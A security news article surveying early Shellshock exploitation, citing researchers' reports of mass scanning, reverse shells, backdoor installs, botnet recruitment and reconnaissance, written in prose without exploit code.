Making Sense Of Shellshock Attack Chaos

As security teams reel from last week's Shellshock headlines, attackers are catching on quickly to the vulnerability. Exploits have rapidly come out of the woodwork. Researchers immediately warned this major vulnerability in Bash would likely have a much worse impact than Heartbleed, considering the severity of the exploit and its pervasive presence in so many Linux and UNIX systems. The resulting attacks are starting to crystallize their picture of the threat.

"Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it," according to a post by Johannes Ullrich, director of the SANS Internet Storm Center. Ullrich reports a number of different attacks, including vulnerability checks using multiple headers and simple vulnerability checks using custom user agents.

According to Incapsula research released Friday, in just 24 hours, it recorded 17,400 attacks against its WAF installed base, lashing out at approximately 1,800 domains. The attacks are originating from 400 unique IP addresses, with more than half of them in China or the US. Researchers have noted not only an increasing volume of attacks, but also a growing variety of ways attackers are leveraging the Bash bug to commandeer web servers.

For example, Kaspersky Lab's Stefan Ortloff detailed two attacks. One, known as a reverse-connect-shell, will "just create a new instance of bash and redirect it to a remote server listening on a specific TCP port." The other uses specially crafted HTTP-requests to start installing Linux backdoors on victims' servers.

However, much of the early criminal activity seems to center on the bad guys building up their botnets using the newly discovered vulnerability.

"What we are seeing here are hackers using existing botnets to create new ones: running automated scripts from compromised servers to add more hijacked machines to their 'flock,'" Ofer Gayer, a researcher for Incapsula, explained in a blog post. "During the last 24 hours we saw several botnet shepherds using repurposed DDoS bots in an attempt to exploit Shellshock vulnerability to gain server access."

This has been confirmed by researchers in Italy, who report that a botnet called wopbot running on Linux servers went to work last week DDoSing Akamai's content delivery network and running large-scale scans against the US Department of Defense for "brute force attack purposes," according to researchers at Kaspersky. And researchers at FireEye ran down a laundry list of exploitation techniques already seen in Shellshock traffic. They include automated click fraud, password stealing, and backdoor installation, with payloads that include reverse shell Perl scripts, UDP flood attacks, and IRC-based DDoS.

"The Shellshock traffic we have been able to observe is still quite chaotic," writes James Bennett of FireEye. "It is largely characterized by high volume automated scans and PoC-like exploit scripts."

Meantime, researchers at TrendMicro wrote this morning of an attack they followed against a Chinese financial institution that should give security teams pause. Attackers in that instance were simply trying to see if several IPs owned by the institution were vulnerable to the Shellshock bug.

"Further analysis revealed that three of the tested IPs were possibly vulnerable, as the attackers tried to the use the command '/bin/uname -a.' The command 'uname' displays system information, including the OS platform, the machine type, and the processor information," Trend researchers wrote. "At first glance, retrieving system information might seem harmless. But as we mentioned before, the information-gathering could possibly be a sign of preparation for more damaging routines."

This kind of early attack could be laying the groundwork for future attacks -- and it is looking like it is not an isolated incident of attack reconnaissance.